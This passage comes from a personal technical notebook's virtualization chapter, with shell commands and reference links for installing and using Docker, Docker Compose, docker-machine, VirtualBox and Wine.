$ sudo groupadd docker $ sudo usermod -a -G docker ${USER} $ sudo service docker restart # To prevent log out and log back in again, # to pick up the new docker group permissions on the current bash session $ newgrp docker https://docs.docker.com/engine/installation/debian/ http://askubuntu.com/questions/477551/how-can-i-use-docker-without-sudo

53.2.8 Install Docker Compose

$ sudo su $ curl -L https://github.com/docker/compose/releases/download/1.9.0/docker-compose-

˓→`uname -s`-`uname -m` > /usr/local/bin/docker-compose $ sudo chmod +x /usr/local/bin/docker-compose $ exit $ docker-compose --version # docker-compose version 1.9.0, build 2585387 https://docs.docker.com/compose/install/ Dockerfile reference: https://docs.docker.com/engine/reference/builder/

53.2.9 Docker Compose

Reference: https://docs.docker.com/compose/reference/ https://docs.docker.com/compose/compose-file/

53.2.10 Install docker machine

$ apt-get install virtualbox $ sudo curl -L https://github.com/docker/machine/releases/download/v0.9.0-rc2/docker-

˓→machine-`uname -s`-`uname -m` >/usr/local/bin/docker-machine&& chmod +x /usr/local/

˓→bin/docker-machine $ docker-machine -v # docker-machine version 0.6.0-rc4, build a71048c https://docs.docker.com/machine/install-machine/ https://github.com/docker/machine

53.2.11 How to use docker machine

Docker Machine allows you to provision Docker on virtual machines that reside either on your local system or on a cloud provider.

53.2. DOCKER 393 Omid Raha MyStack Documentation, Release 0.1

Docker Machine creates a host on a VM and you use the Docker Engine client as needed to build images and create containers on the host. You all might have had that moment like “ Ahh man! I have to execute all these commands again!!”. And if you are that guy who hates to configure a docker host again and again, docker-machine is there for the rescue. So, you can leave all the installation and configuration tasks of docker to docker-machine. Docker machine lets you spin up docker host VMs locally on your laptop, a cloud-provider (AWS, Azure etc) and your private data center (OpenStack, Vsphere etc). Not only docker host provisioning, using docker machine you can manage deploy and manage containers on individual hosts. First, ensure that the latest VirtualBox is correctly installed on your system.

$ docker-machine ls $ docker-machine create --driver virtualbox $ docker-machine create --driver virtualbox default #(default) Boot2Docker v1.9.1 has a known issue with . #(default) See here for more details: https://github.com/docker/docker/issues/18180 #(default) Consider specifying another storage driver (e.g. 'overlay') using '--

˓→engine-storage-driver' instead. $ docker-machine create --engine-storage-driver overlay --driver virtualbox default $ docker-machine env # export DOCKER_TLS_VERIFY="1" # export DOCKER_HOST="tcp://192.168.99.100:2376" # export DOCKER_CERT_PATH="/home/or/.docker/machine/machines/default" # export DOCKER_MACHINE_NAME="default" # # Run this command to configure your shell: # # eval $(docker-machine env default) $ eval $(docker-machine env default) $ docker ps $ docker images $ docker-machine stop $ docker-machine restart $ docker-machine start $ docker history IMAGE_ID

https://docs.docker.com/machine/ https://docs.docker.com/machine/get-started/ https://docs.docker.com/machine/drivers/ https://docs.docker.com/machine/reference/ https://docs.docker.com/machine/get-started-cloud/ http://devopscube.com/docker-machine-tutorial-getting-started-guide/

53.2.12 Docker toolbox

https://www.docker.com/products/docker-toolbox

53.2.13 Others:

https://dzone.com/articles/how-ansible-and-docker-fit

394 Chapter 53. Virtualization Omid Raha MyStack Documentation, Release 0.1 https://github.com/erroneousboat/docker-django

53.2.14 Docker misconceptions https://valdhaus.co/writings/docker-misconceptions/

53.2.15 Service orchestration and management tool

Service discovery https://github.com/hashicorp/serf https://github.com/coreos/etcd https://zookeeper.apache.org/ https://www.ansible.com/orchestration https://blog.docker.com/tag/orchestration/

53.2.16 Docker on multi host https://blog.docker.com/2015/11/docker-multi-host-networking-ga/ https://docs.docker.com/engine/extend/plugins/ https://www.weave.works/i-just-created-a-cassandra-cluster-that-spans-3-different-network-domains-by-using-2-simple-shell-commands-how-cool-is-that/ https://blog.docker.com/2015/11/docker-multi-host-networking-ga/ An overlay network Docker’s overlay network driver supports multi-host networking natively out-of-the-box. This support is accomplished with the help of libnetwork, a built-in VXLAN-based overlay network driver, and Docker’s libkv library. https://docs.docker.com/engine/userguide/networking/dockernetworks/ Docker Engine supports multi-host networking out-of-the-box through the overlay network driver. Unlike bridge networks, overlay networks require some pre-existing conditions before you can create one. These conditions are: Access to a key-value store. Docker supports Consul, Etcd, and ZooKeeper (Distributed store) key-value stores. A cluster of hosts with connectivity to the key-value store. A properly configured Engine daemon on each host in the cluster. Hosts within the cluster must have unique hostnames because the key-value store uses the hostnames to identify cluster members. https://docs.docker.com/engine/userguide/networking/get-started-overlay/ https://github.com/dave-tucker/docker-network-demos/blob/master/multihost-local.sh https://www.auzias.net/en/docker-network-multihost/ http://stackoverflow.com/questions/34262182/docker-multi-host-networking-cluster-advertise-option

53.2. DOCKER 395 Omid Raha MyStack Documentation, Release 0.1

53.2.17 docker machine https://docs.docker.com/machine/get-started-cloud/ https://docs.docker.com/machine/drivers/ http://devopscube.com/docker-machine-tutorial-getting-started-guide/

53.2.18 How to run a command on an already existing docker container? if the container is stopped and can’t be started due to an error, you’ll need to commit it. Then you can launch bash in an image:

$ docker commit CONTAINER_ID temporary_image $ docker run -it temporary_image /bin/bash

53.2.19 Removing Docker data volumes? http://serverfault.com/a/738721

$ du -h --max-depth=1 /var/lib/docker | sort -hr $ docker volume rm $(docker volume ls -qf dangling=true)

53.2.20 Clear log history

$ vim docker-logs-clean.sh

#!/bin/bash for container_id in $(docker ps -a --filter="name=$name" -q);

do file=$(docker inspect $container_id | grep -G '"LogPath": "*"' | sed -e 's/.* ˓→"LogPath": "//g' | sed -e 's/",//g');

if [ -f $file] then rm $file; fi done

$ chmod +x docker-logs-clean.sh $ sudo ./docker-logs-clean.sh https://github.com/docker/compose/issues/1083#issuecomment-216540808

53.2.21 Set maximum concurrent download for docker pull

$ sudo vim /lib/systemd/system/docker.service

[Service] ExecStart=/usr/bin/dockerd -H fd:// --max-concurrent-downloads1

(continues on next page)

396 Chapter 53. Virtualization Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) $ sudo systemctl daemon-reload $ systemctl restart docker

53.2.22 Override the ENTRYPOINT using docker run docker run -it --entrypoint "/bin/bash" --rm -v"$PWD":/ws/omr/ lsakalauskas/sdaps

53.2.23 Set image name when building a custom image

$ docker build -t image_name .

53.2.24 Set environment variables during the build in docker

FROM ubuntu:18.04 RUN apt-get update ARG DEBIAN_FRONTEND=noninteractive

The ARG is for setting environment variables which are used during the docker build process, and they are not present in the final image

53.2.25 Remove unused, , untag docker images file

$ docker image prune -f https://docs.docker.com/engine/reference/commandline/image_prune/#usage

53.2.26 Disable auto-restart on a container

$ docker update --restart=no container-id

53.2.27 Minimal base docker OS images

• https://registry.hub.docker.com/_/ubuntu/ • https://registry.hub.docker.com/u/library/debian/ • https://registry.hub.docker.com/_/busybox/ • https://registry.hub.docker.com/_/centos/ • https://registry.hub.docker.com/_/fedora/ • https://registry.hub.docker.com/_/alpine/ • https://registry.hub.docker.com/_/cirros/ • https://hub.docker.com/_/python/ • https://github.com/GoogleContainerTools/distroless

53.2. DOCKER 397 Omid Raha MyStack Documentation, Release 0.1 https://www.brianchristner.io/docker-image-base-os-size-comparison/

$ docker pull python:3.6-alpine $ docker images | grep -i python # python 3.6-alpine cb04a359db13 3 days ago 74.

˓→3MB https://github.com/docker-library/python

$ docker pull gcr.io/distroless/python3 $ docker images | grep -i distroless # gcr.io/distroless/python3 latest 523f07cec1e2 49 years ago

˓→ 50.9MB

Note that there is no `docker exec(run) -it ...` in distroless image. https://github.com/GoogleContainerTools/distroless Links: https://medium.com/c0d1um/building-django-docker-image-with-alpine-32de65d2706 https://www.caktusgroup.com/blog/2017/03/14/production-ready-dockerfile-your-python-django-app/

53.3 Virtual box

53.3.1 Install latest version

$ sudo apt-get purge virtualbox-\* # download from https://www.virtualbox.org/wiki/Linux_Downloads $ wget $ sudo dpkg -i

53.3.2 Unistall running virtualbox

$ sudo service vboxdrv stop $ ps aux | grep VBoxSVC $ pidof VBoxSVC $ sudo kill -9 7811 $ sudo apt-get purge virtualbox-\*

53.4 Wine

53.4.1 Wine PATH through command line

$ export WINEPATH=/new/path/

Wine CMD Version5.1.2600(1.6.2) C:\>echo %PATH% /new/path/;C:\windows\system32;C:\windows; https://stackoverflow.com/a/33220534

398 Chapter 53. Virtualization CHAPTER 54

Indices and tables

• genindex • search

399